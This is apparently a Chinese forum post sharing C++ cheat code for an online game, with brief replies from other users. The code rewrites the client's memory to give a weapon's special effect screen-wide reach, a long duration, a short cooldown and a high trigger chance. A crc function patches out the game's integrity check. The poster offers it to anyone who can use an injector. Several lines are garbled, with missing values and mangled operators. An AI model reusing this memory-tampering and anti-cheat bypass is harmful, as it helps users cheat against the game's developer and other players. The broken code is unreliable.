假紫武器能处理全屏异常void jiazhiyichang(DWORD dalei,DWORD value)//dalei=7{ DWORD p1; DWORD //全屏 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x6d0 h=4;//4全屏怪物 //3角色附近怪
起效对象 if (dalei==7&&value==12) {
h=2; } bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); //效果持续时间 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x8;//0x8 h=60000;//持续时间毫秒 if (dalei==7&&value==12) h=6000000; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); //冷却时间 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 h=300;//冷却时间毫秒 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); //几率 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x2c;//0x2c ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 h=97;//百分几率 bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); //h=20，攻击怪物时触发效果；h=25，移动时触发效果 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 h=25;//h=20，攻击怪触发效果；h=25，移动触发效果 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); //类型，假紫武器大类，H=7异常类效果，H=26恢复类效果，H=18召唤类效果 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 h= bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); //类型，1冰2毒3眩晕4诅咒5失明6感电7石化8睡眠9烧伤10破武器11出血12加速13祝福14元素伤害15混乱16束缚17破甲18全部 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 h= bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); //类型，异常等级，召唤怪物的时候为怪等级 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x8;//0x8 h=155; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); //类型，异常类中带伤害中的伤害值 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0//0xc h=7; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); if (dalei==7&&value==12) { h=200; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);
p1=p1+4; h=200; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0); }}
void ycxue(int i,int value){ DWORD p1; DWORD crc(); //全屏 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x6d0 h=4;//4全屏怪物 //3角色附近怪
起效对象 bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);//效果持续时间 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x8;//0x8 h=100;//持续时间毫秒 bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);//冷却时间 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 h=100;//冷却时间毫秒 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0);//几率 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x2c;//0x2c ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 h=97;//百分几率 bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);//h=20，攻击怪物时触发效果；h=25，移动时触发效果 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 h=25;//h=20，攻击怪触发效果；h=25，移动触发效果 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0);//类型，假紫武器大类，H=7异常类效果，H=26恢复类效果，H=18召唤类效果 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 h=26; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);//类型 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 h=0; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);//类型，异常等级，召唤怪物的时候为怪等级 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x8;//0x8 h=i; bas=(float)h; WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);//类型，异常类中带伤害中的伤害值 ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x347c;//0x347c武器偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x324;//0x324假紫 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x0;//0x0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x6d0;//0x6d0 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x18;//0x18 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x4;//0x4 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x40;//0x40 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0//0xc bas= WriteProcessMemory(hProcess,(LPVOID)p1,&bas,sizeof(DWORD),0);}void crc(){
DWORD p1; BYTE BYTEReadProcessMemory(hProcess,(LPVOID)dtcrc1, &h, sizeof(DWORD), 0);p1 = h + 0ReadProcessMemory(hProcess,(LPVOID)p1, &h, sizeof(DWORD),0);p1 = h + 0x400;base=195;WriteProcessMemory(hProcess,(LPVOID)p1,&base,sizeof(DWORD),0);}void
RenWuJieKouPM(){
DWORD p1; DWORD p2; DWORD BYTE BYTE base,base1;ReadProcessMemory(hProcess,(LPVOID)shubiaojizhi, &hh, sizeof(DWORD), 0); p1 = hh + 0x324;ReadProcessMemory(hProcess,(LPVOID)renwujizhi, &hh, sizeof(DWORD),0);p2 = hh + 0x347C;ReadProcessMemory(hProcess,(LPVOID)p2, &hh, sizeof(DWORD),0);p2 = hh + 0x324;base=0;for (i=0;i&12;i++){ ReadProcessMemory(hProcess,(LPVOID)(p1+i), &h, sizeof(BYTE),0);
base+=h;}for (i=0;i&12;i++){ ReadProcessMemory(hProcess,(LPVOID)(p1+i), &h, sizeof(BYTE),0); base=h; ReadProcessMemory(hProcess,(LPVOID)(p2+i), &h, sizeof(BYTE),0); base1=h;
WriteProcessMemory(hProcess,(LPVOID)(p1+i),&base1,sizeof(BYTE),0); WriteProcessMemory(hProcess,(LPVOID)(p2+i),&base,sizeof(BYTE),0);}}void exit(){ CloseHandle(hProcess); exit(0);}
会使用注入器的，或会写的朋友可以参考。
好像我初中数学的效果
代码量好大
通过什么方法注入
楼主，可否介绍个C++的入门教材或书籍？
楼主你能不能把读写内存写成函数来调用，你这样好麻烦而且代码量又很高
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或